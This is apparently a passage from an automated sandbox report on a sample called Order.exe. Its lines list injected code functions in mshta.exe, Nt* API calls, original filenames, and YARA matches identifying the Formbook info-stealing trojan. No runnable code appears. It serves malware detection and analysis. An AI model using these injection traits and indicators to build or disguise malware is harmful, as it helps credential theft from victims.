                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03982F60 NtCreateProcessEx,9_2_03982F60
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03982EA0 NtAdjustPrivilegesToken,9_2_03982EA0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03982E30 NtWriteVirtualMemory,9_2_03982E30
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03982DB0 NtEnumerateKey,9_2_03982DB0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03982D00 NtSetInformationFile,9_2_03982D00
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03982CC0 NtQueryVirtualMemory,9_2_03982CC0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03982CF0 NtOpenProcess,9_2_03982CF0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03982C00 NtQueryInformationProcess,9_2_03982C00
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03983090 NtSetValueKey,9_2_03983090
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03983010 NtOpenDirectoryObject,9_2_03983010
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03983D10 NtOpenProcessToken,9_2_03983D10
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03983D70 NtOpenThread,9_2_03983D70
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_00BA9210 NtCreateFile,9_2_00BA9210
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_00BA9380 NtReadFile,9_2_00BA9380
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_00BA9470 NtDeleteFile,9_2_00BA9470
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_00BA9510 NtClose,9_2_00BA9510
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_00BA9680 NtAllocateVirtualMemory,9_2_00BA9680
                  Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_00C1D4A40_2_00C1D4A4
                  Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_04FE49E00_2_04FE49E0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_04FE49CB0_2_04FE49CB
                  Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_055A74A00_2_055A74A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_055AA3800_2_055AA380
                  Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_055AAB380_2_055AAB38
                  Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_055AE45B0_2_055AE45B
                  Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_055A74920_2_055A7492
                  Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_055A71700_2_055A7170
                  Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_055A71600_2_055A7160
                  Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_055AA3700_2_055AA370
                  Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_055AAB270_2_055AAB27
                  Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_07AC5F600_2_07AC5F60
                  Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_07AC84680_2_07AC8468
                  Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_07AC37F80_2_07AC37F8
                  Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_07AC5F510_2_07AC5F51
                  Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_07AC1D070_2_07AC1D07
                  Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_07AC21400_2_07AC2140
                  Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_07AC21500_2_07AC2150
                  Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_07AC18E00_2_07AC18E0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_07AC40D00_2_07AC40D0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_004187F35_2_004187F3
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_004100735_2_00410073
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_004028F05_2_004028F0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_004011505_2_00401150
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_004031205_2_00403120
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_004169CE5_2_004169CE
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_004169D35_2_004169D3
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_004102935_2_00410293
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0040E3135_2_0040E313
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_004024005_2_00402400
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_004025A05_2_004025A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0042EF035_2_0042EF03
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A041A25_2_01A041A2
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A101AA5_2_01A101AA
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A081CC5_2_01A081CC
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019EA1185_2_019EA118
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019401005_2_01940100
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019D81585_2_019D8158
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019E20005_2_019E2000
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A103E65_2_01A103E6
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0195E3F05_2_0195E3F0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A0A3525_2_01A0A352
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019D02C05_2_019D02C0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019F02745_2_019F0274
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A105915_2_01A10591
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019505355_2_01950535
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019FE4F65_2_019FE4F6
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019F44205_2_019F4420
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A024465_2_01A02446
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194C7C05_2_0194C7C0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019747505_2_01974750
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019507705_2_01950770
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0196C6E05_2_0196C6E0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A1A9A65_2_01A1A9A6
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019529A05_2_019529A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019669625_2_01966962
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019368B85_2_019368B8
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197E8F05_2_0197E8F0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019528405_2_01952840
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0195A8405_2_0195A840
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A06BD75_2_01A06BD7
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A0AB405_2_01A0AB40
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194EA805_2_0194EA80
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01968DBF5_2_01968DBF
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194ADE05_2_0194ADE0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019ECD1F5_2_019ECD1F
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0195AD005_2_0195AD00
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019F0CB55_2_019F0CB5
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01940CF25_2_01940CF2
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01950C005_2_01950C00
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019CEFA05_2_019CEFA0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01942FC85_2_01942FC8
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01970F305_2_01970F30
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019F2F305_2_019F2F30
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01992F285_2_01992F28
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C4F405_2_019C4F40
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01962E905_2_01962E90
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A0CE935_2_01A0CE93
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A0EEDB5_2_01A0EEDB
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A0EE265_2_01A0EE26
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01950E595_2_01950E59
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0195B1B05_2_0195B1B0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A1B16B5_2_01A1B16B
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0193F1725_2_0193F172
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0198516C5_2_0198516C
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A0F0E05_2_01A0F0E0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A070E95_2_01A070E9
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019FF0CC5_2_019FF0CC
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019570C05_2_019570C0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0199739A5_2_0199739A
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A0132D5_2_01A0132D
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0193D34C5_2_0193D34C
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019552A05_2_019552A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0196B2C05_2_0196B2C0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0196D2F05_2_0196D2F0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019F12ED5_2_019F12ED
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019ED5B05_2_019ED5B0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A195C35_2_01A195C3
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A075715_2_01A07571
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A0F43F5_2_01A0F43F
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019414605_2_01941460
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A0F7B05_2_01A0F7B0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A016CC5_2_01A016CC
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019956305_2_01995630
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019E59105_2_019E5910
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019599505_2_01959950
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0196B9505_2_0196B950
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019538E05_2_019538E0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019BD8005_2_019BD800
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0196FB805_2_0196FB80
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0198DBF95_2_0198DBF9
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C5BF05_2_019C5BF0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A0FB765_2_01A0FB76
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019EDAAC5_2_019EDAAC
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01995AA05_2_01995AA0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019F1AA35_2_019F1AA3
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019FDAC65_2_019FDAC6
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A07A465_2_01A07A46
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A0FA495_2_01A0FA49
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C3A6C5_2_019C3A6C
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0196FDC05_2_0196FDC0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A07D735_2_01A07D73
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01953D405_2_01953D40
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A01D5A5_2_01A01D5A
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A0FCF25_2_01A0FCF2
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C9C325_2_019C9C32
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01951F925_2_01951F92
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A0FFB15_2_01A0FFB1
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01913FD25_2_01913FD2
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01913FD55_2_01913FD5
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A0FF095_2_01A0FF09
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01959EB05_2_01959EB0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03A103E69_2_03A103E6
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_0395E3F09_2_0395E3F0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03A0A3529_2_03A0A352
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039D02C09_2_039D02C0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039F02749_2_039F0274
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03A041A29_2_03A041A2
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03A101AA9_2_03A101AA
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03A081CC9_2_03A081CC
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039EA1189_2_039EA118
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039401009_2_03940100
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039D81589_2_039D8158
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039E20009_2_039E2000
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_0394C7C09_2_0394C7C0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039747509_2_03974750
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039507709_2_03950770
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_0396C6E09_2_0396C6E0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03A105919_2_03A10591
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039505359_2_03950535
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039FE4F69_2_039FE4F6
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039F44209_2_039F4420
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03A024469_2_03A02446
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03A06BD79_2_03A06BD7
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03A0AB409_2_03A0AB40
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_0394EA809_2_0394EA80
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03A1A9A69_2_03A1A9A6
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039529A09_2_039529A0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039669629_2_03966962
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039368B89_2_039368B8
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_0397E8F09_2_0397E8F0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039528409_2_03952840
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_0395A8409_2_0395A840
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039CEFA09_2_039CEFA0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03942FC89_2_03942FC8
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03970F309_2_03970F30
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039F2F309_2_039F2F30
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03992F289_2_03992F28
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039C4F409_2_039C4F40
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03962E909_2_03962E90
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03A0CE939_2_03A0CE93
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03A0EEDB9_2_03A0EEDB
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03A0EE269_2_03A0EE26
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03950E599_2_03950E59
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03968DBF9_2_03968DBF
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039ECD1F9_2_039ECD1F
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_0395AD009_2_0395AD00
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039F0CB59_2_039F0CB5
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03940CF29_2_03940CF2
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03950C009_2_03950C00
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_0399739A9_2_0399739A
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03A0132D9_2_03A0132D
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_0393D34C9_2_0393D34C
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039552A09_2_039552A0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_0396B2C09_2_0396B2C0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_0396D2F09_2_0396D2F0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039F12ED9_2_039F12ED
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_0395B1B09_2_0395B1B0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03A1B16B9_2_03A1B16B
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_0393F1729_2_0393F172
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_0398516C9_2_0398516C
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03A0F0E09_2_03A0F0E0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03A070E99_2_03A070E9
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039FF0CC9_2_039FF0CC
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039570C09_2_039570C0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03A0F7B09_2_03A0F7B0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03A016CC9_2_03A016CC
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039956309_2_03995630
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039ED5B09_2_039ED5B0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03A195C39_2_03A195C3
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03A075719_2_03A07571
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03A0F43F9_2_03A0F43F
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039414609_2_03941460
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_0396FB809_2_0396FB80
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_0398DBF99_2_0398DBF9
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039C5BF09_2_039C5BF0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03A0FB769_2_03A0FB76
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039EDAAC9_2_039EDAAC
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03995AA09_2_03995AA0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039F1AA39_2_039F1AA3
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039FDAC69_2_039FDAC6
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03A07A469_2_03A07A46
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03A0FA499_2_03A0FA49
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039C3A6C9_2_039C3A6C
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039E59109_2_039E5910
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039599509_2_03959950
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_0396B9509_2_0396B950
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039538E09_2_039538E0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039BD8009_2_039BD800
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03951F929_2_03951F92
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03A0FFB19_2_03A0FFB1
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03913FD29_2_03913FD2
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03913FD59_2_03913FD5
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03A0FF099_2_03A0FF09
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03959EB09_2_03959EB0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_0396FDC09_2_0396FDC0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03A07D739_2_03A07D73
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03953D409_2_03953D40
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03A01D5A9_2_03A01D5A
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03A0FCF29_2_03A0FCF2
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039C9C329_2_039C9C32
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_00B91DC09_2_00B91DC0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_00B8CCD09_2_00B8CCD0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_00B8CEF09_2_00B8CEF0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_00B8AF709_2_00B8AF70
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_00B954509_2_00B95450
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_00B936309_2_00B93630
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_00B9362B9_2_00B9362B
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_00BABB609_2_00BABB60
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_0376E5439_2_0376E543
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_0376E4249_2_0376E424
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_0376CBE89_2_0376CBE8
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_0376D9489_2_0376D948
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_0376E8DC9_2_0376E8DC
                  Source: C:\Users\user\Desktop\Order.exeCode function: String function: 01985130 appears 58 times
                  Source: C:\Users\user\Desktop\Order.exeCode function: String function: 019CF290 appears 103 times
                  Source: C:\Users\user\Desktop\Order.exeCode function: String function: 01997E54 appears 107 times
                  Source: C:\Users\user\Desktop\Order.exeCode function: String function: 0193B970 appears 262 times
                  Source: C:\Users\user\Desktop\Order.exeCode function: String function: 019BEA12 appears 86 times
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: String function: 039BEA12 appears 86 times
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: String function: 03997E54 appears 107 times
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: String function: 0393B970 appears 262 times
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: String function: 039CF290 appears 103 times
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: String function: 03985130 appears 58 times
                  Source: Order.exe, 00000000.00000002.1740687497.0000000003A39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Order.exe
                  Source: Order.exe, 00000000.00000002.1736244515.0000000000C2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Order.exe
                  Source: Order.exe, 00000000.00000002.1760307093.00000000076B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Order.exe
                  Source: Order.exe, 00000000.00000000.1671095901.00000000005FA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameqwhy.exe& vs Order.exe
                  Source: Order.exe, 00000005.00000002.1904639284.00000000013B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMSHTA.EXED vs Order.exe
                  Source: Order.exe, 00000005.00000002.1905093933.0000000001A3D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Order.exe
                  Source: Order.exe, 00000005.00000002.1904639284.00000000013A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMSHTA.EXED vs Order.exe
                  Source: Order.exeBinary or memory string: OriginalFilenameqwhy.exe& vs Order.exe
                  Source: Order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 5.2.Order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 5.2.Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000005.00000002.1904953976.0000000001880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000009.00000002.4144193946.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
